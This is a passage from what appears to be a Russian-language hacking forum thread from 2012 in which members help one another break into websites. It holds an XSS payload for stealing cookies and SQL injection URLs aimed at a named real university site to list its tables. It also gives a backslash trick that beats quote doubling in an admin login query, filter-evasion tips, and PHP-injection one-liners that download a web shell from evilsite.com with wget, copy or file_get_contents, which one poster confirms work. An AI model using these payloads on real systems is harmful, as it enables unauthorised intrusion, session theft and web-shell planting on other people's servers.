Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. p1rotexn1k

    p1rotexn1k New Member

    Joined:
    7 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    нашел пассивку вместо alert%28document.cookie%29 вставил
    type=text/javascript%20src=http://мойсайт.org/script.js
    Разные варианты пробовал, но все-ровно не приходят куки на сниффер, подскажите что не так, а то заколебался.
    сам script.js
     
  2. KeyFound!89

    KeyFound!89 New Member

    Joined:
    28 Apr 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Как обойти фильтрацию кавычки функцией eregi_replace ???

    есть такой код:
    <php
    ...
    foreach($_POST as $var => $val){
    $_POST[$var]=trim(eregi_replace("'","''",$val)); // экранит кавычку( вместо одной появляется две
    }

    ...

    $rez=mysql_query("select id from admins where admlogin='".$_POST["login"]."' and admpass=password('".$_POST["pass"]."');",$link);

    >

    логин\пасс вбиваются через форму и шлются POST'OM.
    Делаю инъект в логин: login=admin' # & pass=anyparol и тут бы все хорошо, но срабатывающий erig_replace превращает select в такое:

    Query select id from admins where admlogin='admin' ' #' and admpass=password('anyparol').

    Исходник скрипта у меня есть и я пробовал убирать строку с фильтрацией тогда можно логиниться без пасса! Помагите пожалуйста обойти экранирование!
     
  3. KeyFound!89

    KeyFound!89 New Member

    Joined:
    28 Apr 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Мы продаем или покупаем!? (С) Одесситы

    Поставь воблу на локалхост и мониторь через пэхапэадмин. Сначала поглядишь на локалхосте, а когда будет sql на чужом сервере уже будешь знать имена таблиц - они стандартные для всех. Если чтото изменено (что врядли) смотри имена таблиц в информайшин схеме сервера, что своего что чужого.
     
  4. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Помогите раскрутить MsSql

    PHP:
    http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15--+f
     
    _________________________
    #20704 kingbeef, 8 Jul 2012
    Last edited: 8 Jul 2012
  5. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    Code:
    http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+(char(115)%2Bchar(101)%2Bchar(109)%2Bchar(105)%2Bchar(110)%2Bchar(97)%2Bchar(114)%2Bchar(115))--+f
    в чаре первая таблица "seminars", далее выводим вторую "newsitems", тоже переводим ее в чар и через запятую добавляем, также надо будет делать и с колонками ))
     
  6. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to kingbeef
    Не надо страдать ерундой и загонять в char... Все и так нормально работает.
    Code:
    http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name+not+in+('seminars','newsitems')--+f 
     
    1 person likes this.
  7. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    php-injection

    В общем нашел сайт с уязвимостью php-injection (через POST) в поле
    Как мне:
    1) Вывести содержание какого-либо файла например index.php
    2) Как залить shell?
    Работают только подобные команды:
    ${@print(phpversion())} Результат: 4.4.9
    ${@print(php_uname())} Результат: FreeBSD fe45.hc.ru 8.2-RELEASE-p4 FreeBSD 8.2-RELEASE-p4 #0: Wed Oct 12 17:05:45 UTC 2011 [email protected]:/usr/obj/i386/usr/src/sys/FE i386
    ${@print(mysql_get_client_info())} Результат: 4.1.25
    ${@print(mysql_get_server_info())} Результат: 4.1.25-log
    ${@print(mysql_list_dbs())} Результат: Resource id #612
    ${@print(phpinfo(INFO_GENERAL))} Результат (таблица) Configure Command './configure' '--enable-versioning' '--enable-memory-limit' '--with-layout=GNU' '--with-config-file-scan-dir=/usr/local/php4/etc/php' '--disable-all' '--program-prefix=' '--enable-discard-path' '--with-regex=php' '--enable-zend-multibyte' '--prefix=/usr/local/php4' '--mandir=/usr/local/php4/man' '--infodir=/usr/local/php4/info/' '--build=i386-portbld-freebsd8.2'
    и т.д.
     
  8. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to kacergei
    Ну так используйте вместо print(), include() или require(), заливать шелл можно через file_put_contents('shell.php',file_get_contents('http://evilsite.com/shell.txt')), copy('http://evilsite.com/shell.txt', 'shell.php') или в system('wget -O shell.php http://evilsite.com/shell.txt'). Собственно вариантов еще много, есть из чего выбирать
     
  9. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Спасибо всё работает)
     
    #20709 kacergei, 9 Jul 2012
    Last edited: 9 Jul 2012
  10. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Вопрос про RSA. Public key известный - 3. реально найти private key? public key - 3
     
  11. mikky

    mikky New Member

    Joined:
    7 Jul 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Имеется скуль, присутствует фильтрация на information_schema.tables.
    Как обойти? Регистр, и /*!information_schema.tables*/ не помогло.
     
  12. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to mikky
    Тяните из columns в чем проблема то? ;)
     
  13. mikky

    mikky New Member

    Joined:
    7 Jul 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    cat1vo Да в том и дело, что information_schema.columns как information_schema.tables фильтруется, я так понимаю безвыходная ситуация?
    P.S. Приходит в голову только брут таблиц, и колонок, как в mysql <=4
    UPD. Отправка постом тоже не помогает, линк к сожалению выложить не могу.
     
    #20713 mikky, 9 Jul 2012
    Last edited: 9 Jul 2012
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Варианты есть, надо смотреть, что и как филтруется, и после пробовать обходить! Я тоже не экстрасенс. Выложите урл, быстрее помогут Вам!
     
  15. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    2mikky
    попробуй information_schema.`tables`
     
  16. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Есть скуль. В имени базы данных присутствует тире ("db-name").
    вывод ошибки, я так понимаю говорит о том, что ошибку вызывает именно тире в имени.
    Может кто то знает как это обойти?
     
  17. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    `имя БД`
     
    _________________________
    1 person likes this.
  18. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Спасибо! А то я че то торможу)))
     
  19. anon12

    anon12 New Member

    Joined:
    21 Jun 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    нашёл на сервере уязвимость типа mod_isapi, но эксплоит не работает, потому что сервер висит с другими на одном и том же айпишнике, и соответственно все это работает на обратном прокси. вопрос: можно ли обойти этот самый прокси и запустить нормально эксплоит?
     
  20. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42
    Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример:
    \' union select 111#

    получится

    select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol')

    Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.
     
Thread Status:
Not open for further replies.